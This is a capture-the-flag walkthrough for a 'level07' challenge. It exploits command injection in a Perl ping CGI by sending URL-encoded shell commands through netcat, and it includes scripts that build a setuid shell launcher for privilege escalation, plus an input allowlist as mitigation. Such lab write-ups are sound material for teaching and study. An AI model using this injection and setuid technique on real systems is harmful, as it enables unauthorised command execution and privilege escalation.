For the level07 challenge we have some Perl code to analyze. The code is available both on the virtual machine and on the challenge page.
What you’ll need to know…
- Perl basics
- Webservers
- Netcat
Level07
In level07 we need to interact with a web server.
We'll use netcat to talk to it. You can find the port the server listens on in the file thttpd.conf, under the option "port".
Once connected, you send it HTTP requests, for example a GET if you want to retrieve something from the server.
Now send the server the request line "GET /index.cgi?Host=localhost HTTP/1.1", followed by "Host: localhost" on the next line and a blank line to end the headers. The CGI script will ping the host you gave it, running as the flag07 user. So if we chain commands once more, as in earlier levels, we can have the server run commands for us.
Typing all of that by hand every time is tedious, so put the request in a file and redirect it into netcat: "nc localhost 7007 < file".
Next, I create the SUID program (the same one used in several earlier levels), together with a small script that compiles the C program and sets the SUID bit. Here's what my C program looks like.
And here is my shell script.
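The author's C program and build script appear in the post only as images. The script below is an added example, not the author's code: it writes an assumed reconstruction of such a setuid shell launcher, compiles it and sets the SUID bit. The output directory and binary name (for instance /home/flag07 and moveaxme) are assumptions passed as arguments.

```sh
#!/bin/sh
# Added example (not the author's program, which the post shows only as an
# image): write a minimal setuid shell launcher in C, compile it and set the
# SUID bit. The output directory and binary name are assumptions passed as
# arguments, e.g. /home/flag07 and moveaxme.

write_suid_source() {
    # $1 = path of the .c file to create
    cat > "$1" <<'EOF'
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>

/* A setuid binary starts with euid = owner but uid = caller. Make the
 * effective ids real before exec'ing the shell, otherwise /bin/sh may
 * drop the privileges again. */
int main(void)
{
    uid_t uid = geteuid();
    gid_t gid = getegid();
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0) {
        perror("setresuid/setresgid");
        return 1;
    }
    execl("/bin/sh", "sh", (char *)0);
    perror("execl");   /* only reached if the exec failed */
    return 1;
}
EOF
}

build_suid_shell() {
    # $1 = directory to build in, $2 = binary name
    dir=$1
    name=$2
    src="$dir/$name.c"
    write_suid_source "$src" || return 1
    gcc -o "$dir/$name" "$src" || return 1
    # 4755: setuid bit plus rwxr-xr-x. The owner is whoever runs this script;
    # when the CGI runs it, that is flag07, which is the whole point.
    chmod 4755 "$dir/$name" || return 1
    rm -f "$src"
}

# Run only when invoked with both arguments, so that sourcing the file
# (for instance to reuse the functions) does nothing on its own.
if [ "$#" -eq 2 ]; then
    build_suid_shell "$1" "$2"
fi
```

Place the script in /tmp and have the injected command run it, e.g. `sh /tmp/build.sh /home/flag07 moveaxme`; because the CGI runs as flag07, the resulting binary is owned by flag07 and the SUID bit hands out that identity.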
Now we just need to update the file we pass to netcat. Remember that to send several commands to the shell at once we separate them with ";", but such characters have to be URL-encoded so that neither the web server nor the CGI library interprets them: a "%" followed by the character's ASCII code in hexadecimal (";" becomes %3B, a space %20, "/" %2F). Here's the file I pass to the netcat connection. One piece of advice: put all the files in /tmp, so you won't run into permission problems.
Notice that all the reserved characters are encoded. If you now connect to the web server with netcat, feeding it the file with the HTTP request, you'll see the same output as in the first image. But if you look in the /home/flag07 folder you can see our moveaxme SUID program.
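The request described above (the GET with the injected Host parameter, sent through netcat) and the percent-encoding of the reserved characters, as one added example that is not the author's request file (shown only as an image). The target localhost:7007 comes from thttpd.conf as the post says; the injected command is an assumption, for example `localhost; sh /tmp/build.sh /home/flag07 moveaxme`, where /tmp/build.sh is a hypothetical build script placed in /tmp beforehand.

```sh
#!/bin/sh
# Added example, not the author's request file (shown only as an image):
# percent-encode an injected command, wrap it in the HTTP request the post
# describes, and feed it to netcat. The target (localhost:7007, from
# thttpd.conf) matches the post; the injected command is an assumption,
# e.g. "localhost; sh /tmp/build.sh /home/flag07 moveaxme" where
# /tmp/build.sh is a hypothetical script placed in /tmp beforehand.

urlencode() {
    # Percent-encode every byte of $1 except the unreserved set
    # [A-Za-z0-9._~-]; ";", space and "/" all become %XX escapes so that
    # neither thttpd nor the CGI library treats them as separators.
    s=$1
    out=""
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}          # first character of $s
        s=${s#?}                 # the rest
        case $c in
            [A-Za-z0-9._~-]) out="$out$c" ;;
            *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'c" = ASCII code of c
        esac
    done
    printf '%s\n' "$out"
}

build_request() {
    # $1 = value for the Host: header, $2 = shell command to inject.
    # The CGI's ping target comes from the Host= query parameter, so the
    # injection goes there. HTTP wants CRLF line endings and a blank line
    # after the headers; Connection: close makes thttpd hang up when done.
    printf 'GET /index.cgi?Host=%s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' \
        "$(urlencode "$2")" "$1"
}

send_request() {
    # $1 = host, $2 = port, $3 = command to inject; needs nc on PATH.
    build_request "$1" "$3" | nc "$1" "$2"
}

# Usage: sh inject.sh localhost 7007 'localhost; id'
# To keep a copy of the request (the post's "nc localhost 7007 < file"
# approach), run build_request ... > file and redirect that file into nc.
if [ "$#" -eq 3 ]; then
    send_request "$1" "$2" "$3"
fi
```

Everything after "localhost" still has to be a valid shell command for the user the CGI runs as, so keep the injected script and its arguments on paths that flag07 can read and write, which is why /tmp is the convenient place.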
Now it's just a matter of running this little program and you'll have a shell as the flag07 account. After that, just collect the flag.
Solved!
Challenges completed: 8/20
Mitigation
Input validation and sanitization matter for all kinds of applications, not just web servers. If the program's purpose was only to ping an IP address, it should have accepted nothing but digits and dots in the user-supplied string and rejected anything else, instead of handing the value straight to a shell.
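The allowlist check the CGI should have performed, as an added example rather than code from the challenge, written in shell instead of the challenge's Perl. `ping_host` stands in for the CGI's call to ping; the "-c 3" count is an assumption.

```sh
#!/bin/sh
# Added example, not code from the challenge: the allowlist check the CGI
# should have performed before handing the Host parameter to ping, written
# here in shell rather than the challenge's Perl. ping_host is a stand-in
# for the CGI's call; the "-c 3" count is an assumption.

is_ipv4() {
    # Accept only four dot-separated decimal octets in 0-255. Anything else,
    # including "localhost; id", "1.2.3", "1..2.3.4" or "256.1.1.1", is
    # rejected; no attempt is made to strip or escape bad characters.
    addr=$1
    case $addr in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $addr            # split on "." into $1..$n
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

ping_host() {
    # Vulnerable shape, for contrast (never executed here): the parameter is
    # interpolated into a command line that a shell parses, so
    #   sh -c "ping -c 3 $1"   with $1 = 'localhost; id'
    # runs ping and then id. Hardened: validate against the allowlist, then
    # pass the value as a single argv element so no shell ever parses it.
    if ! is_ipv4 "$1"; then
        printf 'refusing to ping %s: not an IPv4 address\n' "$1" >&2
        return 2
    fi
    ping -c 3 "$1"
}

if [ "$#" -eq 1 ]; then
    ping_host "$1"
fi
```

Rejecting rather than "cleaning" the input is deliberate: a sanitizer that only strips ";" still has to worry about "|", "&", "`", "$(" and newlines, whereas an allowlist of digits and dots leaves nothing for a shell to interpret.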
Never trust the input!